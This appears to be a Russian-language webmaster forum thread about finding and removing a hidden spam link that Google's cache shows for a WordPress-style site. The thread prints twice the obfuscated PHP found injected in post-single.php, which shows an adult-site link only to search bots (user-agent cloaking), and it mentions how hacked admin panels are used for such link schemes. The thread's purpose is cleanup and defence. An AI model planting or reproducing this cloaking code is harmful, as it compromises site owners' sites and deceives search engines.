В гугл кэш посторонняя ссылка

пройдитесь поиском по всем файлам. поищите "base64_decode", "урл_ссылки", "юзерагент_гугла"

Нашел! В файле post-single.php в самом конце был прописан такой код

<?php $x0d="\x70\x72\x65\x67_m\x61t\143\x68"; $x0b = $_SERVER['HTTP_USER_AGENT'];$x0c=" \015 \x20\x20\040\040 \x20\x3ca \x68\x72e\146\x3d'\x68t\x74\x70\x3a\057\057\x77\167\x77.c\x65\154\151\141\143ams\056c\x6fm/\167\x65\142\143a\155/w\x68ite-g\x69\162\x6c\x73/'\x3e\127\145\x62c\x61\x6d\040\x53\145\x78</a\x3e\040";if ($x0d('*bot*', $x0b)) {echo $x0c;} else {echo ' ';}

Всё, проверил гуглоботом, всё чисто! Всем спасибо за помощь.

<?php $x0d="\x70\x72\x65\x67_m\x61t\143\x68"; $x0b = $_SERVER['HTTP_USER_AGENT'];$x0c=" \015 \x20\x20\040\040 \x20\x3ca \x68\x72e\146\x3d'\x68t\x74\x70\x3a\057\057\x77\167\x77.c\x65\154\151\141\143ams\056c\x6fm/\167\x65\142\143a\155/w\x68ite-g\x69\162\x6c\x73/'\x3e\127\145\x62c\x61\x6d\040\x53\145\x78</a\x3e\040";if ($x0d('*bot*', $x0b)) {echo $x0c;} else {echo ' ';}

Этот хитрый код показывает ссылку только поисковым ботам, но не людям я так понял?

Верно, как я понял у этой ерунды есть термин: Клоакинг по юзер агенту.

Да, так и есть. Если в имени юзер агента есть слово *bot*, то ссылка показывается. Хитро придумано, еще не сталкивался с подобным :)

Учтите, что вы только убрали следствие.. Вам ведь, как-то всунули эту ссылку;)

Это не клиент DISQUS поламали случайно?

100% нет. Я его поставил 3 дня назад, а ссылка была раньше. Я теперь уже начинаю подозревать одного из форумчан. Давал доступ одному умельцу чтобы сделал кое какие манипуляции для сайта. Правда делали это всё еще 8 августа, а файл где был этот код был редактирован последний раз 25 августа.

ну, как бы, дате изменения доверять тоже особо не стоит...меняется на раз-два. Смотря какой доступ был получен... Тут уж лучше по логам смотреть, если конечно они есть.

Даааа. Сочувствую. Если Вы давали доступ к серверу, или к одному из сайтов в админку, а на этом сервере под одним и тем же аком есть еще много сайтов, тогда Я Вам еще больше сочуствую. Лично знаю одного из форумчан, который такими вот ссылками(мигающие ссылки) поднимает ТИЦ. Точнее поднимал раньше. Как это точно делается, ну наверное проще всего зайти на один из сайтов, где пачками продают взломанные админки от сайтов, потом суют туда вот похожие , на тот что вы попалили код, или вшивают скрипт в файлы с расширением *.js , *.php итд и тп, а потом и мигают ссылки с ваших сайтов. А вы их пробуете поднять, траф с них получить, а ни хера, потому что в итоге Ваш сайта уже как линкопомойка для ПС. Дадада. ВОт так и я когда то в шоке был от того, что на однмо из моих серверов около 30 сайтов так вот мигало ссылками. Я я думал, ну что за фигня. наращиваю ссылочную массу, разбавляю беки и тд и тп. А ни трафа, ни ТИЦ - нифига нет. Наоборот, только страницы стали вылетать с индекса.